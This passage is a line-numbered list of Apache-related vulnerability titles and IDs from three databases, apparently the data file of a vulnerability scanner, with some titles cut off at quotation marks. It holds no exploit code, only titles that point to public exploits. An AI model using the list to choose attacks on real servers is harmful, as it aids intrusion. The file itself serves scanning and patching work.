14443| [16705] Apache mod_ssl format string attack
14444| [16524] Apache HTTP Server ap_get_mime_headers_core denial of service
14445| [16387] Apache HTTP Server mod_proxy Content-Length buffer overflow
14446| [16230] Apache HTTP Server PHP denial of service
14447| [16214] Apache mod_ssl ssl_util_uuencode_binary buffer overflow
14448| [15958] Apache HTTP Server authentication modules memory corruption
14449| [15547] Apache HTTP Server mod_disk_cache local information disclosure
14450| [15540] Apache HTTP Server socket starvation denial of service
14451| [15467] Novell GroupWise WebAccess using Apache Web server allows viewing of files on the server
14452| [15422] Apache HTTP Server mod_access information disclosure
14453| [15419] Apache HTTP Server mod_ssl plain HTTP request denial of service
14454| [15293] Apache for Cygwin "
14455| [15065] Apache-SSL has a default password
14456| [15041] Apache HTTP Server mod_digest module could allow an attacker to replay responses
14457| [15015] Apache httpd server httpd.conf could allow a local user to bypass restrictions
14458| [14751] Apache Mod_python output filter information disclosure
14459| [14125] Apache HTTP Server mod_userdir module information disclosure
14460| [14075] Apache HTTP Server mod_php file descriptor leak
14461| [13703] Apache HTTP Server account
14462| [13689] Apache HTTP Server configuration allows symlinks
14463| [13688] Apache HTTP Server configuration allows SSI
14464| [13687] Apache HTTP Server Server: header value
14465| [13685] Apache HTTP Server ServerTokens value
14466| [13684] Apache HTTP Server ServerSignature value
14467| [13672] Apache HTTP Server config allows directory autoindexing
14468| [13671] Apache HTTP Server default content
14469| [13670] Apache HTTP Server config file directive references outside content root
14470| [13668] Apache HTTP Server httpd not running in chroot environment
14471| [13666] Apache HTTP Server CGI directory contains possible command interpreter or compiler
14472| [13664] Apache HTTP Server config file contains ScriptAlias entry
14473| [13663] Apache HTTP Server CGI support modules loaded
14474| [13661] Apache HTTP Server config file contains AddHandler entry
14475| [13660] Apache HTTP Server 500 error page not CGI script
14476| [13659] Apache HTTP Server 413 error page not CGI script
14477| [13658] Apache HTTP Server 403 error page not CGI script
14478| [13657] Apache HTTP Server 401 error page not CGI script
14479| [13552] Apache HTTP Server mod_cgid module information disclosure
14480| [13550] Apache GET request directory traversal
14481| [13516] Apache Cocoon XMLForm and JXForm could allow execution of code
14482| [13499] Apache Cocoon directory traversal allows downloading of boot.ini file
14483| [13429] Apache Tomcat non-HTTP request denial of service
14484| [13400] Apache HTTP server mod_alias and mod_rewrite buffer overflow
14485| [13295] Apache weak password encryption
14486| [13254] Apache Tomcat .jsp cross-site scripting
14487| [13125] Apache::Gallery Inline::C could allow arbitrary code execution
14488| [13086] Apache Jakarta Tomcat mod_jk format string allows remote access
14489| [12681] Apache HTTP Server mod_proxy could allow mail relaying
14490| [12662] Apache HTTP Server rotatelogs denial of service
14491| [12554] Apache Tomcat stores password in plain text
14492| [12553] Apache HTTP Server redirects and subrequests denial of service
14493| [12552] Apache HTTP Server FTP proxy server denial of service
14494| [12551] Apache HTTP Server prefork MPM denial of service
14495| [12550] Apache HTTP Server weaker than expected encryption
14496| [12549] Apache HTTP Server type-map file denial of service
14497| [12206] Apache Tomcat /opt/tomcat directory insecure permissions
14498| [12102] Apache Jakarta Tomcat MS-DOS device name request denial of service
14499| [12091] Apache HTTP Server apr_password_validate denial of service
14500| [12090] Apache HTTP Server apr_psprintf code execution
14501| [11804] Apache HTTP Server mod_access_referer denial of service
14502| [11750] Apache HTTP Server could leak sensitive file descriptors
14503| [11730] Apache HTTP Server error log and access log terminal escape sequence injection
14504| [11703] Apache long slash path allows directory listing
14505| [11695] Apache HTTP Server LF (Line Feed) denial of service
14506| [11694] Apache HTTP Server filestat.c denial of service
14507| [11438] Apache HTTP Server MIME message boundaries information disclosure
14508| [11412] Apache HTTP Server error log terminal escape sequence injection
14509| [11196] Apache Tomcat examples and ROOT Web applications cross-site scripting
14510| [11195] Apache Tomcat web.xml could be used to read files
14511| [11194] Apache Tomcat URL appended with a null character could list directories
14512| [11139] Apache HTTP Server mass virtual hosting with mod_rewrite or mod_vhost_alias could allow an attacker to obtain files
14513| [11126] Apache HTTP Server illegal character file disclosure
14514| [11125] Apache HTTP Server DOS device name HTTP POST code execution
14515| [11124] Apache HTTP Server DOS device name denial of service
14516| [11088] Apache HTTP Server mod_vhost_alias CGI source disclosure
14517| [10938] Apache HTTP Server printenv test CGI cross-site scripting
14518| [10771] Apache Tomcat mod_jk module multiple HTTP GET request buffer overflow
14519| [10575] Apache mod_php module could allow an attacker to take over the httpd process
14520| [10499] Apache HTTP Server WebDAV HTTP POST view source
14521| [10457] Apache HTTP Server mod_ssl "
14522| [10415] Apache HTTP Server htdigest insecure system() call could allow command execution
14523| [10414] Apache HTTP Server htdigest multiple buffer overflows
14524| [10413] Apache HTTP Server htdigest temporary file race condition
14525| [10412] Apache HTTP Server htpasswd temporary file race condition
14526| [10376] Apache Tomcat invoker servlet used in conjunction with the default servlet reveals source code
14527| [10348] Apache Tomcat HTTP GET request DOS device reference could cause a denial of service
14528| [10281] Apache HTTP Server ab.c ApacheBench long response buffer overflow
14529| [10280] Apache HTTP Server shared memory scorecard overwrite
14530| [10263] Apache Tomcat mod_jk or mod_jserv connector directory disclosure
14531| [10241] Apache HTTP Server Host: header cross-site scripting
14532| [10230] Slapper worm variants A, B, and C target OpenSSL/Apache systems
14533| [10208] Apache HTTP Server mod_dav denial of service
14534| [10206] HP VVOS Apache mod_ssl denial of service
14535| [10200] Apache HTTP Server stderr denial of service
14536| [10175] Apache Tomcat org.apache.catalina.servlets.DefaultServlet reveals source code
14537| [10169] Slapper worm variant (Slapper.C) targets OpenSSL/Apache systems
14538| [10154] Slapper worm variant (Slapper.B) targets OpenSSL/Apache systems
14539| [10098] Slapper worm targets OpenSSL/Apache systems
14540| [9876] Apache HTTP Server cgi/cgid request could disclose the path to a requested script
14541| [9875] Apache HTTP Server .var file request could disclose installation path
14542| [9863] Apache Tomcat web.xml file could allow a remote attacker to bypass restrictions
14543| [9808] Apache HTTP Server non-Unix version URL encoded directory traversal
14544| [9623] Apache HTTP Server ap_log_rerror() path disclosure
14545| [9520] Apache Tomcat /servlet/ mapping cross-site scripting
14546| [9415] Apache HTTP Server mod_ssl .htaccess off-by-one buffer overflow
14547| [9396] Apache Tomcat null character to threads denial of service
14548| [9394] Apache Tomcat HTTP request for LPT9 reveals Web root path
14549| [9249] Apache HTTP Server chunked encoding heap buffer overflow
14550| [9208] Apache Tomcat sample file requests could reveal directory listing and path to Web root directory
14551| [8932] Apache Tomcat example class information disclosure
14552| [8633] Apache HTTP Server with mod_rewrite could allow an attacker to bypass directives
14553| [8629] Apache HTTP Server double-reverse DNS lookup spoofing
14554| [8589] Apache HTTP Server for Windows DOS batch file remote command execution
14555| [8457] Oracle9i Application Server Apache PL/SQL HTTP Location header buffer overflow
14556| [8455] Oracle9i Application Server default installation could allow an attacker to access certain Apache Services
14557| [8400] Apache HTTP Server mod_frontpage buffer overflows
14558| [8326] Apache HTTP Server multiple MIME headers (sioux) denial of service
14559| [8308] Apache "
14560| [8275] Apache HTTP Server with Multiviews enabled could disclose directory contents
14561| [8119] Apache and PHP OPTIONS request reveals "
14562| [8054] Apache is running on the system
14563| [8029] Mandrake Linux default Apache configuration could allow an attacker to browse files and directories
14564| [8027] Mandrake Linux default Apache configuration has remote management interface enabled
14565| [8026] Mandrake Linux Apache sample programs could disclose sensitive information about the server
14566| [7836] Apache HTTP Server log directory denial of service
14567| [7815] Apache for Windows "
14568| [7810] Apache HTTP request could result in unexpected behavior
14569| [7599] Apache Tomcat reveals installation path
14570| [7494] Apache "
14571| [7419] Apache Web Server could allow remote attackers to overwrite .log files
14572| [7363] Apache Web Server hidden HTTP requests
14573| [7249] Apache mod_proxy denial of service
14574| [7129] Linux with Apache Web server could allow an attacker to determine if a specified username exists
14575| [7103] Apple Mac OS X used with Apache Web server could disclose directory contents
14576| [7059] Apache "
14577| [7057] Apache "
14578| [7056] Apache "
14579| [7055] Apache "
14580| [7054] Apache "
14581| [6997] Apache Jakarta Tomcat error message may reveal information
14582| [6971] Apache Jakarta Tomcat may reveal JSP source code with missing HTTP protocol specification
14583| [6970] Apache crafted HTTP request could reveal the internal IP address
14584| [6921] Apache long slash path allows directory listing
14585| [6687] Apple Mac OS X used with Apache Web server could allow arbitrary file disclosure
14586| [6527] Apache Web Server for Windows and OS2 denial of service
14587| [6316] Apache Jakarta Tomcat may reveal JSP source code
14588| [6305] Apache Jakarta Tomcat directory traversal
14589| [5926] Linux Apache symbolic link
14590| [5659] Apache Web server discloses files when used with php script
14591| [5310] Apache mod_rewrite allows attacker to view arbitrary files
14592| [5204] Apache WebDAV directory listings
14593| [5197] Apache Web server reveals CGI script source code
14594| [5160] Apache Jakarta Tomcat default installation
14595| [5099] Trustix Secure Linux installs Apache with world writable access
14596| [4968] Apache Jakarta Tomcat snoop servlet gives out information which could be used in attack
14597| [4967] Apache Jakarta Tomcat 404 error reveals the pathname of the requested file
14598| [4931] Apache source.asp example file allows users to write to files
14599| [4575] IBM HTTP Server running Apache allows users to directory listing and file retrieval
14600| [4205] Apache Jakarta Tomcat delivers file contents
14601| [2084] Apache on Debian by default serves the /usr/doc directory
14602| [1630] MessageMedia UnityMail and Apache Web server MIME header flood denial of service
14603| [697] Apache HTTP server beck exploit
14604| [331] Apache cookies buffer overflow
14605|
14606| Exploit-DB - https://www.exploit-db.com:
14607| [31130] Apache Tomcat <= 6.0.15 Cookie Quote Handling Remote Information Disclosure Vulnerability
14608| [31052] Apache <= 2.2.6 'mod_negotiation' HTML Injection and HTTP Response Splitting Vulnerability
14609| [30901] Apache HTTP Server 2.2.6 Windows Share PHP File Extension Mapping Information Disclosure Vulnerability
14610| [30835] Apache HTTP Server <= 2.2.4 413 Error HTTP Request Method Cross-Site Scripting Weakness
14611| [30563] Apache Tomcat <= 5.5.15 Cal2.JSP Cross-Site Scripting Vulnerability
14612| [30496] Apache Tomcat <= 6.0.13 Cookie Handling Quote Delimiter Session ID Disclosure
14613| [30495] Apache Tomcat <= 6.0.13 Host Manager Servlet Cross Site Scripting Vulnerability
14614| [30191] Apache MyFaces Tomahawk JSF Framework 1.1.5 Autoscroll Parameter Cross Site Scripting Vulnerability
14615| [30189] Apache Tomcat <= 6.0.13 JSP Example Web Applications Cross Site Scripting Vulnerability
14616| [30052] Apache Tomcat 6.0.10 Documentation Sample Application Multiple Cross-Site Scripting Vulnerabilities
14617| [29930] Apache AXIS 1.0 Non-Existent WSDL Path Information Disclosure Vulnerability
14618| [29859] Apache Roller OGNL Injection
14619| [29739] Apache HTTP Server Tomcat 5.x/6.0.x Directory Traversal Vulnerability
14620| [29435] Apache Tomcat 5.5.25 - CSRF Vulnerabilities
14621| [29316] Apache + PHP 5.x - Remote Code Execution (Multithreaded Scanner) (2)
14622| [29290] Apache / PHP 5.x Remote Code Execution Exploit
14623| [28713] Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object RCE
14624| [28424] Apache 2.x HTTP Server Arbitrary HTTP Request Headers Security Weakness
14625| [28365] Apache 2.2.2 CGI Script Source Code Information Disclosure Vulnerability
14626| [28254] Apache Tomcat 5 Information Disclosure Vulnerability
14627| [27915] Apache James 2.2 SMTP Denial of Service Vulnerability
14628| [27397] Apache suEXEC Privilege Elevation / Information Disclosure
14629| [27135] Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution
14630| [27096] Apache Geronimo 1.0 Error Page XSS
14631| [27095] Apache Tomcat / Geronimo 1.0 Sample Script cal2.jsp time Parameter XSS
14632| [26710] Apache CXF prior to 2.5.10, 2.6.7 and 2.7.4 - Denial of Service
14633| [26542] Apache Struts 1.2.7 Error Response Cross-Site Scripting Vulnerability
14634| [25986] Plesk Apache Zeroday Remote Exploit
14635| [25980] Apache Struts includeParams Remote Code Execution
14636| [25625] Apache 1.3.x HTDigest Realm Command Line Argument Buffer Overflow Vulnerability (2)
14637| [25624] Apache 1.3.x HTDigest Realm Command Line Argument Buffer Overflow Vulnerability (1)
14638| [24874] Apache Struts ParametersInterceptor Remote Code Execution
14639| [24744] Apache Rave 0.11 - 0.20 - User Information Disclosure
14640| [24694] Apache 1.3.x mod_include Local Buffer Overflow Vulnerability
14641| [24590] Apache 2.0.x mod_ssl Remote Denial of Service Vulnerability
14642| [23751] Apache Cygwin 1.3.x/2.0.x Directory Traversal Vulnerability
14643| [23581] Apache 2.0.4x mod_perl Module File Descriptor Leakage Vulnerability
14644| [23482] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (2)
14645| [23481] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (1)
14646| [23296] Red Hat Apache 2.0.40 Directory Index Default Configuration Error
14647| [23282] apache cocoon 2.14/2.2 - Directory Traversal vulnerability
14648| [23245] Apache Tomcat 4.0.x Non-HTTP Request Denial of Service Vulnerability
14649| [23119] Apache::Gallery 0.4/0.5/0.6 Insecure Local File Storage Privilege Escalation Vulnerability
14650| [22505] Apache Mod_Access_Referer 1.0.2 NULL Pointer Dereference Denial of Service Vulnerability
14651| [22205] Apache Tomcat 3.x Null Byte Directory/File Disclosure Vulnerability
14652| [22191] Apache Web Server 2.0.x MS-DOS Device Name Denial of Service Vulnerability
14653| [22068] Apache 1.3.x,Tomcat 4.0.x/4.1.x Mod_JK Chunked Encoding Denial of Service Vulnerability
14654| [21885] Apache 1.3/2.0.x Server Side Include Cross Site Scripting Vulnerability
14655| [21882] Apache Tomcat 3.2 Directory Disclosure Vulnerability
14656| [21854] Apache 2.0.39/40 Oversized STDERR Buffer Denial of Service Vulnerability
14657| [21853] Apache Tomcat 3/4 DefaultServlet File Disclosure Vulnerability
14658| [21734] Apache Tomcat 4.1 JSP Request Cross Site Scripting Vulnerability
14659| [21719] Apache 2.0 Path Disclosure Vulnerability
14660| [21697] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability
14661| [21605] Apache Tomcat 4.0.3 DoS Device Name Cross Site Scripting Vulnerability
14662| [21604] Apache Tomcat 4.0.3 Servlet Mapping Cross Site Scripting Vulnerability
14663| [21560] Apache 1.x/2.0.x Chunked-Encoding Memory Corruption Vulnerability (2)
14664| [21559] Apache 1.x/2.0.x Chunked-Encoding Memory Corruption Vulnerability (1)
14665| [21534] Apache Tomcat 3/4 JSP Engine Denial of Service Vulnerability
14666| [21492] Apache Tomcat 3.2.3/3.2.4 RealPath.JSP Malformed Request Information Disclosure
14667| [21491] Apache Tomcat 3.2.3/3.2.4 Example Files Web Root Path Disclosure
14668| [21490] Apache Tomcat 3.2.3/3.2.4 Source.JSP Malformed Request Information Disclosure
14669| [21412] Apache Tomcat 4.0/4.1 Servlet Path Disclosure Vulnerability
14670| [21350] Apache Win32 1.3.x/2.0.x Batch File Remote Command Execution Vulnerability
14671| [21204] Apache 1.3.20 Win32 PHP.EXE Remote File Disclosure Vulnerability
14672| [21112] Red Hat Linux 7.0 Apache Remote Username Enumeration Vulnerability
14673| [21067] Apache 1.0/1.2/1.3 Server Address Disclosure Vulnerability
14674| [21002] Apache 1.3 Possible Directory Index Disclosure Vulnerability
14675| [20911] Apache 1.3.14 Mac File Protection Bypass Vulnerability
14676| [20716] apache tomcat 3.0 - Directory Traversal vulnerability
14677| [20695] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (4)
14678| [20694] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (3)
14679| [20693] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (2)
14680| [20692] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (1)
14681| [20595] NCSA 1.3/1.4.x/1.5,Apache httpd 0.8.11/0.8.14 ScriptAlias Source Retrieval Vulnerability
14682| [20558] Apache 1.2 Web Server DoS Vulnerability
14683| [20466] Apache 1.3 Web Server with Php 3 File Disclosure Vulnerability
14684| [20435] Apache 0.8.x/1.0.x,NCSA httpd 1.x test-cgi Directory Listing Vulnerability
14685| [20272] Apache 1.2.5/1.3.1,UnityMail 2.0 MIME Header DoS Vulnerability
14686| [20210] Apache 1.3.12 WebDAV Directory Listings Vulnerability
14687| [20131] Apache Tomcat 3.1 Path Revealing Vulnerability
14688| [19975] Apache 1.3.6/1.3.9/1.3.11/1.3.12/1.3.20 Root Directory Access Vulnerability
14689| [19828] Cobalt RaQ 2.0/3.0 Apache .htaccess Disclosure Vulnerability
14690| [19536] Apache <= 1.1,NCSA httpd <= 1.5.2,Netscape Server 1.12/1.1/2.0 a nph-test-cgi Vulnerability
14691| [19231] PHP apache_request_headers Function Buffer Overflow
14692| [18984] Apache Struts <= 2.2.1.1 - Remote Command Execution
14693| [18897] Oracle Weblogic Apache Connector POST Request Buffer Overflow
14694| [18619] Apache Tomcat Remote Exploit (PUT Request) and Account Scanner
14695| [18452] Apache Struts Multiple Persistent Cross-Site Scripting Vulnerabilities
14696| [18442] Apache httpOnly Cookie Disclosure
14697| [18329] Apache Struts2 <= 2.3.1 - Multiple Vulnerabilities
14698| [18221] Apache HTTP Server Denial of Service
14699| [17969] Apache mod_proxy Reverse Proxy Exposure Vulnerability PoC
14700| [17696] Apache httpd Remote Denial of Service (memory exhaustion)
14701| [17691] Apache Struts < 2.2.0 - Remote Command Execution
14702| [16798] Apache mod_jk 1.2.20 Buffer Overflow
14703| [16782] Apache Win32 Chunked Encoding
14704| [16752] Apache module mod_rewrite LDAP protocol Buffer Overflow
14705| [16317] Apache Tomcat Manager Application Deployer Authenticated Code Execution
14706| [15710] Apache Archiva 1.0 - 1.3.1 CSRF Vulnerability
14707| [15319] Apache 2.2 (Windows) Local Denial of Service
14708| [14617] Apache JackRabbit 2.0.0 webapp XPath Injection
14709| [14489] Apache Tomcat < 6.0.18 utf8 - Directory Traversal vulnerability
14710| [12721] Apache Axis2 1.4.1 - Local File Inclusion Vulnerability
14711| [12689] Authenticated Cross-Site Scripting Vulnerability (XSS) within Apache Axis2 administration console
14712| [12343] Apache Tomcat 5.5.0 to 5.5.29 & 6.0.0 to 6.0.26 - Information Disclosure Vulnerability
14713| [12330] Apache OFBiz - Multiple XSS
14714| [12264] Apache OFBiz - FULLADMIN Creator PoC Payload
14715| [12263] Apache OFBiz - SQL Remote Execution PoC Payload
14716| [11662] Apache Spamassassin Milter Plugin Remote Root Command Execution
14717| [11650] Apache 2.2.14 mod_isapi Dangling Pointer Remote SYSTEM Exploit
14718| [10811] Joomla.Tutorials GHDB: Apache directory listing Download Vulnerability
14719| [10292] Apache Tomcat 3.2.1 - 404 Error Page Cross Site Scripting Vulnerability
14720| [9995] Apache Tomcat Form Authentication Username Enumeration Weakness
14721| [9994] Apache Tomcat Cookie Quote Handling Remote Information Disclosure Vulnerability
14722| [9993] Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross Site Scripting Vulnerability
14723| [8842] Apache mod_dav / svn Remote Denial of Service Exploit
14724| [8458] Apache Geronimo <= 2.1.3 - Multiple Directory Traversal Vulnerabilities
14725| [7264] Apache Tomcat runtime.getRuntime().exec() Privilege Escalation (win)
14726| [6229] apache tomcat < 6.0.18 utf8 - Directory Traversal vulnerability
14727| [6100] Apache mod_jk 1.2.19 Remote Buffer Overflow Exploit (win32)
14728| [6089] Bea Weblogic Apache Connector Code Exec / Denial of Service Exploit
14729| [5386] Apache Tomcat Connector jk2-2.0.2 (mod_jk2) Remote Overflow Exploit
14730| [5330] Apache 2.0 mod_jk2 2.0.2 - Remote Buffer Overflow Exploit (win32)
14731| [4552] Apache Tomcat (webdav) Remote File Disclosure Exploit (ssl support)
14732| [4530] Apache Tomcat (webdav) Remote File Disclosure Exploit
14733| [4162] Apache Tomcat Connector (mod_jk) Remote Exploit (exec-shield)
14734| [4093] Apache mod_jk 1.2.19/1.2.20 Remote Buffer Overflow Exploit
14735| [3996] Apache 2.0.58 mod_rewrite Remote Overflow Exploit (win2k3)
14736| [3680] Apache Mod_Rewrite Off-by-one Remote Overflow Exploit (win32)
14737| [3384] Ubuntu/Debian Apache 1.3.33/1.3.34 (CGI TTY) Local Root Exploit
14738| [2237] Apache < 1.3.37, 2.0.59, 2.2.3 (mod_rewrite) Remote Overflow PoC
14739| [2061] Apache Tomcat < 5.5.17 Remote Directory Listing Vulnerability
14740| [1056] Apache <= 2.0.49 Arbitrary Long HTTP Headers Denial of Service
14741| [855] Apache <= 2.0.52 HTTP GET request Denial of Service Exploit
14742| [764] Apache OpenSSL - Remote Exploit (Multiple Targets) (OpenFuckV2.c)
14743| [587] Apache <= 1.3.31 mod_include Local Buffer Overflow Exploit
14744| [466] htpasswd Apache 1.3.31 - Local Exploit
14745| [371] Apache HTTPd Arbitrary Long HTTP Headers DoS (c version)
14746| [360] Apache HTTPd Arbitrary Long HTTP Headers DoS
14747| [132] Apache 1.3.x - 2.0.48 - mod_userdir Remote Users Disclosure Exploit
14748| [126] Apache mod_gzip (with debug_mode) <= 1.2.26.1a Remote Exploit
14749| [67] Apache 1.3.x mod_mylo Remote Code Execution Exploit
14750| [38] Apache <= 2.0.45 APR Remote Exploit -Apache-Knacker.pl
14751| [34] Webfroot Shoutbox < 2.32 (Apache) Remote Exploit
14752| [11] Apache <= 2.0.44 Linux Remote Denial of Service Exploit
14753| [9] Apache HTTP Server 2.x Memory Leak Exploit
14754|
14755| OpenVAS (Nessus) - http://www.openvas.org:
14756| [902924] Apache Struts2 Showcase Skill Name Remote Code Execution Vulnerability
14757| [902837] PHP 'apache_request_headers()' Function Buffer Overflow Vulnerability (Windows)
14758| [902830] Apache HTTP Server 'httpOnly' Cookie Information Disclosure Vulnerability
14759| [902664] Apache Traffic Server HTTP Host Header Denial of Service Vulnerability
14760| [901203] Apache httpd Web Server Range Header Denial of Service Vulnerability
14761| [901110] Apache ActiveMQ Source Code Information Disclosure Vulnerability
14762| [901105] Apache OFBiz Multiple Cross Site Scripting Vulnerabilities
14763| [900842] Apache 'mod_proxy_ftp' Module Command Injection Vulnerability (Linux)
14764| [900841] Apache 'mod_proxy_ftp' Module Denial Of Service Vulnerability (Linux)
14765| [900573] Apache APR-Utils XML Parser Denial of Service Vulnerability
14766| [900572] Apache APR-Utils Multiple Denial of Service Vulnerabilities
14767| [900571] Apache APR-Utils Version Detection
14768| [900499] Apache mod_proxy_ajp Information Disclosure Vulnerability
14769| [900496] Apache Tiles Multiple XSS Vulnerability
14770| [900493] Apache Tiles Version Detection
14771| [900107] Apache mod_proxy_ftp Wildcard Characters XSS Vulnerability
14772| [900021] Apache Tomcat Cross-Site Scripting and Security Bypass Vulnerabilities
14773| [880086] CentOS Update for apache CESA-2008:0004-01 centos2 i386
14774| [870175] RedHat Update for apache RHSA-2008:0004-01
14775| [864591] Fedora Update for apache-poi FEDORA-2012-10835
14776| [864383] Fedora Update for apache-commons-compress FEDORA-2012-8428
14777| [864280] Fedora Update for apache-commons-compress FEDORA-2012-8465
14778| [864250] Fedora Update for apache-poi FEDORA-2012-7683
14779| [864249] Fedora Update for apache-poi FEDORA-2012-7686
14780| [863993] Fedora Update for apache-commons-daemon FEDORA-2011-10880
14781| [863466] Fedora Update for apache-commons-daemon FEDORA-2011-10936
14782| [855821] Solaris Update for Apache 1.3 122912-19
14783| [855812] Solaris Update for Apache 1.3 122911-19
14784| [855737] Solaris Update for Apache 1.3 122911-17
14785| [855731] Solaris Update for Apache 1.3 122912-17
14786| [855695] Solaris Update for Apache 1.3 122911-16
14787| [855645] Solaris Update for Apache 1.3 122912-16
14788| [855587] Solaris Update for kernel update and Apache 108529-29
14789| [855566] Solaris Update for Apache 116973-07
14790| [855531] Solaris Update for Apache 116974-07
14791| [855524] Solaris Update for Apache 2 120544-14
14792| [855494] Solaris Update for Apache 1.3 122911-15
14793| [855478] Solaris Update for Apache Security 114145-11
14794| [855472] Solaris Update for Apache Security 113146-12
14795| [855179] Solaris Update for Apache 1.3 122912-15
14796| [855147] Solaris Update for kernel update and Apache 108528-29
14797| [855077] Solaris Update for Apache 2 120543-14
14798| [850196] SuSE Update for apache2 openSUSE-SU-2012:0314-1 (apache2)
14799| [850088] SuSE Update for apache2 SUSE-SA:2007:061
14800| [850009] SuSE Update for apache2,apache SUSE-SA:2008:021
14801| [841209] Ubuntu Update for apache2 USN-1627-1
14802| [840900] Ubuntu Update for apache2 USN-1368-1
14803| [840798] Ubuntu Update for apache2 USN-1259-1
14804| [840734] Ubuntu Update for apache2 USN-1199-1
14805| [840542] Ubuntu Update for apache2 vulnerabilities USN-1021-1
14806| [840504] Ubuntu Update for apache2 vulnerability USN-990-2
14807| [840399] Ubuntu Update for apache2 vulnerabilities USN-908-1
14808| [840304] Ubuntu Update for apache2 vulnerabilities USN-575-1
14809| [840118] Ubuntu Update for libapache2-mod-perl2 vulnerability USN-488-1
14810| [840092] Ubuntu Update for apache2 vulnerabilities USN-499-1
14811| [840039] Ubuntu Update for libapache2-mod-python vulnerability USN-430-1
14812| [835253] HP-UX Update for Apache Web Server HPSBUX02645
14813| [835247] HP-UX Update for Apache-based Web Server HPSBUX02612
14814| [835243] HP-UX Update for Apache Running Tomcat Servlet Engine HPSBUX02579
14815| [835236] HP-UX Update for Apache with PHP HPSBUX02543
14816| [835233] HP-UX Update for Apache-based Web Server HPSBUX02531
14817| [835224] HP-UX Update for Apache-based Web Server HPSBUX02465
14818| [835200] HP-UX Update for Apache Web Server Suite HPSBUX02431
14819| [835190] HP-UX Update for Apache Web Server Suite HPSBUX02401
14820| [835188] HP-UX Update for Apache HPSBUX02308
14821| [835181] HP-UX Update for Apache With PHP HPSBUX02332
14822| [835180] HP-UX Update for Apache with PHP HPSBUX02342
14823| [835172] HP-UX Update for Apache HPSBUX02365
14824| [835168] HP-UX Update for Apache HPSBUX02313
14825| [835148] HP-UX Update for Apache HPSBUX01064
14826| [835139] HP-UX Update for Apache with PHP HPSBUX01090
14827| [835131] HP-UX Update for Apache HPSBUX00256
14828| [835119] HP-UX Update for Apache Remote Execution of Arbitrary Code HPSBUX02186
14829| [835104] HP-UX Update for Apache HPSBUX00224
14830| [835103] HP-UX Update for Apache mod_cgid HPSBUX00301
14831| [835101] HP-UX Update for Apache HPSBUX01232
14832| [835080] HP-UX Update for Apache HPSBUX02273
14833| [835078] HP-UX Update for ApacheStrong HPSBUX00255
14834| [835044] HP-UX Update for Apache HPSBUX01019
14835| [835040] HP-UX Update for Apache PHP HPSBUX00207
14836| [835025] HP-UX Update for Apache HPSBUX00197
14837| [835023] HP-UX Update for Apache HPSBUX01022
14838| [835022] HP-UX Update for Apache HPSBUX02292
14839| [835005] HP-UX Update for Apache HPSBUX02262
14840| [831759] Mandriva Update for apache-mod_security MDVSA-2012:182 (apache-mod_security)
14841| [831737] Mandriva Update for apache MDVSA-2012:154-1 (apache)
14842| [831534] Mandriva Update for apache MDVSA-2012:012 (apache)
14843| [831523] Mandriva Update for apache MDVSA-2012:003 (apache)
14844| [831491] Mandriva Update for apache MDVSA-2011:168 (apache)
14845| [831460] Mandriva Update for apache MDVSA-2011:144 (apache)
14846| [831449] Mandriva Update for apache MDVSA-2011:130 (apache)
14847| [831357] Mandriva Update for apache MDVSA-2011:057 (apache)
14848| [831132] Mandriva Update for apache MDVSA-2010:153 (apache)
14849| [831131] Mandriva Update for apache MDVSA-2010:152 (apache)
14850| [830989] Mandriva Update for apache-mod_auth_shadow MDVSA-2010:081 (apache-mod_auth_shadow)
14851| [830931] Mandriva Update for apache MDVSA-2010:057 (apache)
14852| [830926] Mandriva Update for apache MDVSA-2010:053 (apache)
14853| [830918] Mandriva Update for apache-mod_security MDVSA-2010:050 (apache-mod_security)
14854| [830799] Mandriva Update for apache-conf MDVSA-2009:300-2 (apache-conf)
14855| [830797] Mandriva Update for apache-conf MDVSA-2009:300-1 (apache-conf)
14856| [830791] Mandriva Update for apache-conf MDVA-2010:011 (apache-conf)
14857| [830652] Mandriva Update for apache MDVSA-2008:195 (apache)
14858| [830621] Mandriva Update for apache-conf MDVA-2008:129 (apache-conf)
14859| [830581] Mandriva Update for apache MDVSA-2008:016 (apache)
14860| [830294] Mandriva Update for apache MDKSA-2007:140 (apache)
14861| [830196] Mandriva Update for apache MDKSA-2007:235 (apache)
14862| [830112] Mandriva Update for apache MDKSA-2007:127 (apache)
14863| [830109] Mandriva Update for apache-mod_perl MDKSA-2007:083 (apache-mod_perl)
14864| [802425] Apache Struts2 Showcase Arbitrary Java Method Execution vulnerability
14865| [802423] Apache Struts CookBook/Examples Multiple Cross-Site Scripting Vulnerabilities
14866| [802422] Apache Struts Showcase Multiple Persistence Cross-Site Scripting Vulnerabilities
14867| [802415] Apache Tomcat Multiple Security Bypass Vulnerabilities (Win)
14868| [802385] Apache Tomcat Request Object Security Bypass Vulnerability (Win)
14869| [802384] Apache Tomcat Parameter Handling Denial of Service Vulnerability (Win)
14870| [802378] Apache Tomcat Hash Collision Denial Of Service Vulnerability
14871| [801942] Apache Archiva Multiple Vulnerabilities
14872| [801940] Apache Struts2 'XWork' Information Disclosure Vulnerability
14873| [801663] Apache Struts2/XWork Remote Command Execution Vulnerability
14874| [801521] Apache APR-util 'buckets/apr_brigade.c' Denial Of Service Vulnerability
14875| [801284] Apache Derby Information Disclosure Vulnerability
14876| [801203] Apache ActiveMQ Persistent Cross-Site Scripting Vulnerability
14877| [800837] Apache 'mod_deflate' Denial Of Service Vulnerability - July09
14878| [800827] Apache 'mod_proxy_http.c' Denial Of Service Vulnerability
14879| [800680] Apache APR Version Detection
14880| [800679] Apache APR and APR-util Multiple Integer Overflow Vulnerabilities
14881| [800678] Apache Roller 'q' Parameter Cross Site Scripting Vulnerability
14882| [800677] Apache Roller Version Detection
14883| [800279] Apache mod_jk Module Version Detection
14884| [800278] Apache Struts Cross Site Scripting Vulnerability
14885| [800277] Apache Tomcat mod_jk Information Disclosure Vulnerability
14886| [800276] Apache Struts Version Detection
14887| [800271] Apache Struts Directory Traversal Vulnerability
14888| [800024] Apache Tomcat RemoteFilterValve Security Bypass Vulnerability
